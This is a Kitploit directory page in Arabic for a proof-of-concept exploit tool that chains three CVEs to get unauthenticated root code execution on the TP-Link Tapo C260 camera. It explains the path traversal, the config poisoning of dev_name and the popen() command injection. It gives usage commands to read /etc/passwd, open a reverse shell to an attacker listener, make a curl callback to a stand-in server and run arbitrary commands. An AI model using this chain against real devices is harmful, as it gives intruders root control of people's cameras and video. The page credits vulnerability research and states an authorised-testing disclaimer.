Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
tapo-c260-rce — سلسلة استغلال PoC لكاميرا TP-Link Tapo C260 — CVE-2026-0651/0652/0653. بحث من @spaceraccoon. | Kitploit
أدوات/GitHubGitHub/l0lsec/tapo-c260-rce
أمان الأنظمة المدمجةأمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختراق الأجهزةاختبار الاختراقالقيادة والسيطرةأمان الأجهزة وإنترنت الأشياءتحليل البرامج الثابتة
GitHubl0lsec/tapo-c260-rce
12منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

tapo-c260-rce

سلسلة استغلال PoC لكاميرا TP-Link Tapo C260 — CVE-2026-0651/0652/0653. بحث من @spaceraccoon.

عرض المستودع

سلسلة استغلال Tapo C260 (CVE-2026-0651 / CVE-2026-0652 / CVE-2026-0653)

إثبات مفهوم لسلسلة استغلال كاميرا TP-Link Tapo C260 لتحقيق وصول جذري بدون مصادقة (unauthenticated-to-root RCE) من خلال ربط ثلاث ثغرات اكتشفها Eugene Lim (Spaceraccoon).

الإشادة

جميع أبحاث واكتشاف الثغرات من قِبل Eugene Lim (@spaceraccoon).

هذا المستودع هو تنفيذ لإثبات المفهوم بناءً على مقالته العامة. إذا وجدت هذا مفيدًا، فاشترِ كتابه: From Day Zero to Zero Day: A Hands-On Guide to Vulnerability Research (No Starch Press).

سلسلة الثغرات

CVEالنوعالتأثير
CVE-2026-0651اجتياز المسار / كشف الملفات المحليةقراءة ملفات عشوائية عبر /%2e%2e%2f في معالج طلبات HTTP GET
CVE-2026-0652كتابة إعدادات عشوائيةيمكن لمستخدمي مستوى الضيف الكتابة إلى أي مسار إعدادات عبر التلاعب بمفاتيح JSON في واجهة برمجة تطبيقات السحابة
CVE-2026-0653حقن أوامر / تصعيد صلاحياتset_region_code_handle يمرر قيمة إعداد dev_name غير مُنقّاة إلى popen()

سلسلة القتل

root@kitploit:~
LFD (قراءة إعدادات الجهاز) --> كتابة الإعدادات (تسميم dev_name) --> تشغيل معالج رمز المنطقة --> popen() --> شل

المتطلبات

  • Python 3.8+
  • وصول شبكي إلى الكاميرا (لـ LFD) أو رمز مصادقة سحابي صالح من TP-Link (لـ RCE)
  • بيانات اعتماد مستوى الضيف كافية للسلسلة الكاملة

التثبيت

root@kitploit:~
git clone https://github.com/<you>/tapo-c260-rce.git
cd tapo-c260-rce
pip install -r requirements.txt

الاستخدام

كشف الملفات المحلية (CVE-2026-0651)

قراءة ملفات عشوائية من كاميرا على الشبكة المحلية:

root@kitploit:~
python lfd.py --host 192.168.1.100 --token <stok_token> --file /etc/passwd

سلسلة RCE الكاملة (CVE-2026-0651 + CVE-2026-0652 + CVE-2026-0653)

root@kitploit:~
# شل عكسي
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --lhost <YOUR_IP> \
  --lport 4444

# استدعاء فقط (curl ping)
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --callback http://your-server.com/pwned

# أمر مخصص
python exploit.py \
  --cloud-host aps1-app-server.iot.i.tplinkcloud.com \
  --device-id <DEVICE_ID> \
  --cloud-token <CLOUD_AUTH_TOKEN> \
  --cmd "id > /tmp/pwned"

كيف يعمل

  1. التسميم — يرسل طلب setLedStatus بمفاتيح JSON مُتلاعب بها تكتب حمولة أحرف شل ميتا في مسار الإعدادات tp_manage/info/dev_name على الجهاز.

  2. التشغيل — يرسل طلب set_region_code. يقرأ المعالج dev_name من الإعدادات ويدرجه في استدعاء popen() دون تنقية، مما ينفذ الأمر المُحقن.

  3. الشل — يتلقى المهاجم استدعاءً أو شلًا عكسيًا.

البرامج الثابتة المتأثرة

  • TP-Link Tapo C260 (البرامج الثابتة قبل التصحيح)
  • ربما طرازات Tapo أخرى تشترك في نفس الملف الثنائي الشامل /bin/main

إخلاء المسؤولية

هذه الأداة مقدمة لأغراض الاختبار الأمني المصرح به والتعليم فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. المؤلفون غير مسؤولين عن سوء الاستخدام. احصل دائمًا على إذن صريح قبل الاختبار ضد أي جهاز لا تملكه.

المراجع

  • المقالة الأصلية — Spaceraccoon
  • أبحاث بروتوكول Tapo من Kennedn
  • نشرة أمان TP-Link
تنزيل الأداة